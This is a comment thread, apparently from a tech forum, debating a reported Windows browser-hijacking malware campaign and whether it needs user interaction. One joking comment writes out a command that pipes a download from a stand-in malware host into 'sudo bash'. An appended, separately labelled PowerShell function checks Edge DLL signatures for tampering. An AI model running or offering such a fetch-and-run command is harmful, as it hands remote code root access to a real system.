tgsovlerkhgsel · 5 years ago
The article leaves it open whether the user needs to double-click the malicious file or whether it is executed without user interaction through some exploit.

"drive-by download" _usually_ refers to the latter, but the rest of the article not being more explicit and the use of legit-sounding file names makes me think that this may be just another attempt to make non-news appear interesting.

sohkamyung · 5 years ago
Not really the article's fault. As they state near the end, Microsoft themselves didn't provide this info.

> Thursday’s [Microsoft] post doesn’t explicitly say what, if any, user interaction is required for infections to occur. It’s also not clear what effect defenses like User Account Control have. Microsoft makes no mention of the attack hitting browsers running macOS or Linux, so it's likely this campaign affects only Windows users. Microsoft representatives didn’t respond to an email asking for details.

upofadown · 5 years ago
It is still the article's fault for existing at all. The behaviour of the payload is not very interesting or helpful and you have to read almost the entire article to discover that you have wasted your time.
gruez · 5 years ago
>It’s also not clear what effect defenses like User Account Control have

Obligatory:

UAC is not a security feature: https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94...

And considering that UAC only protects against admin (aka root) access, this xkcd applies https://xkcd.com/1200/

grishka · 5 years ago
It's like those "oh my god new Android malware is eating the world" articles that just casually say "after the user installs the apk and gives it device admin permissions" as if it's not a barrier at all. Coincidentally, these articles are usually written by anti-virus companies.
sys_64738 · 5 years ago
It's the line about dropping installer exe files into a directory which is where I stopped reading. This sounds like it needs user execution so isn't really anything new.
afrcnc · 5 years ago
it's social engineering 100%, automatic drive-by installs have been blocked in browsers for years

the reporter should have known this

GoblinSlayer · 5 years ago
Update installations are dropping so ms tries to reinvigorate interest in them. Well, Edge proposes to open the file after download.
swiley · 5 years ago
This kind of thing makes me really miss stuff like Project Wonderful.

Ads could have been something that wasn't abusive but it took some pathological behavior from Google and Facebook to bring us the hell we have now.

wffurr · 5 years ago
Penny Arcade is considering running ads again partly because, as they put it, "I seem to have found somebody that won't serve weird scripts to readers, which has the scent of progress."

They go on: "Because I hail from another era of Internet publishing, there are certain classes of ads that I'm uncomfortable with - of course, these are the most lucrative ones.". Hence the bind less profitable websites find themselves in.

https://www.penny-arcade.com/news/post/2020/12/09/gods

lionkor · 5 years ago
Why are we not seeing more information from MS on this? Should they not explain exactly how it behaves, like if it requires user interaction to run or whatnot? I get that their policy is never to say anything meaningful unless it's a marketing pitch, but this seems like the exact right time to be open and explain exactly what it does.
dkdk8283 · 5 years ago
Chances are the less you know the more likely it has to have a far reach. It’s a bad security move to provide details before X% is patched.
justinlloyd · 5 years ago
Well that article was a waste of time.

I will be down voted with this reddit-like comment but in other news running "curl http://getmesomemalware.com/ - | sudo bash" and then entering your password proves just how insecure Linux actually is.

falsaberN1 · 5 years ago
That sounds more like human error to me.
justinlloyd · 5 years ago
It was a comment on "do stupid things, win stupid prizes." i.e. if you download random bits of code from suspicious websites and give it super user access, you're going to have a bad time.
peanut_worm · 5 years ago
If the user still has to download and install an executable how is it any different than adware we have seen over the past ten years?
Multicomp · 5 years ago
Wonder if my use of ubo n noscript would protect from this? I'm trying to use a Fedora KDE Linux box as my daily driver, but my windows 8 lappy still sits there to run thunderbird rules and onenote, so I'm half protected from an OS perspective I guess?
lionkor · 5 years ago
Looks like an attack specifically on Windows machines, so I'd wager to say Linux is safe. FYI, you can run thunderbird on linux, copy your rules over.
Multicomp · 5 years ago
> you can run thunderbird on linux, copy your rules over.

Now there's a good idea. Going to research how to install Thunderbird on Linux now. I've been a windows baby duck since I first used a computer in 2000 w/ Windows 2000 and so not having familiar creature comforts like thunderbird_setup.exe or even a "Program Files" folder is taking some getting used to.

mydjtl · 5 years ago
Two of my desktop and one of my laptop PCs were hit recently and I was not aware who the most likely corporate or until I read this post. Strange thing is that yesterday I started noticing the same pop-ups in my browser on my Android phone. I'm reinstalling Windows later today on all my three PCs and will be using virustotal religiously.
0134340 · 5 years ago
If you're not running javascript, probably. Better yet fire up a VM if you're heading into the nether-regions of the internet. Or there's also Sandboxie, anyone still use it and recommend?
Multicomp · 5 years ago
My dad loves Sandboxie, even bought a copy.

As for me, I think that VM suggestion is a good idea. In theory I stay on the tech utopia cyberneighborhoods like Matrix forums, Fxtec forums, etc. but I figure banner ads can be found in the most unlikely places.

inlined · 5 years ago
“On Edge, for instance, the malware modifies MsEdge.dll so that it turns off security controls that help detect unauthorized changes to the Secure Preferences file.”

How can malware tamper with a system DLL without code signing setting off alarms?
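An added example, not from the thread or from the article it discusses: by default Windows does not re-verify a DLL's Authenticode signature when an ordinary user-mode process loads it (only a code-integrity policy such as WDAC or Code Integrity Guard enforces that), so a patched MsEdge.dll raises no alarm on its own and has to be found by an explicit check. This PowerShell function does that check; the Edge install path is the usual per-machine default and is an assumption.

```powershell
# Added example (not from the thread): report Edge DLLs whose Authenticode
# signature is no longer Valid, or whose signer is not Microsoft. Windows does
# not re-check these signatures at load time by default, so a tampered
# MsEdge.dll is only noticed when something verifies the file explicitly.
function Get-SuspiciousEdgeDlls {
    param(
        # Default per-machine Edge location (assumed); pass another path if
        # Edge is installed elsewhere, e.g. a per-user profile.
        [string]$EdgeDir = (Join-Path ${env:ProgramFiles(x86)} 'Microsoft\Edge\Application')
    )

    Get-ChildItem -Path $EdgeDir -Recurse -Filter '*.dll' -ErrorAction SilentlyContinue |
        Get-AuthenticodeSignature |
        Where-Object {
            # Status covers NotSigned, HashMismatch (file modified after signing),
            # UnknownError etc.; the subject check catches a re-signed replacement.
            $_.Status -ne 'Valid' -or
            $_.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation'
        } |
        Select-Object @{ Name = 'Path';   Expression = { $_.Path } },
                      @{ Name = 'Status'; Expression = { $_.Status } },
                      @{ Name = 'Signer'; Expression = { $_.SignerCertificate.Subject } }
}

# Usage: an empty result means every DLL under $EdgeDir still carries a valid
# Microsoft signature; a HashMismatch on MsEdge.dll is the symptom the quoted
# article describes.
Get-SuspiciousEdgeDlls | Format-Table -AutoSize
```

Run from an elevated prompt if the Edge directory is not readable by the current user; a modified file shows up as HashMismatch because the embedded signature no longer matches the file's hash.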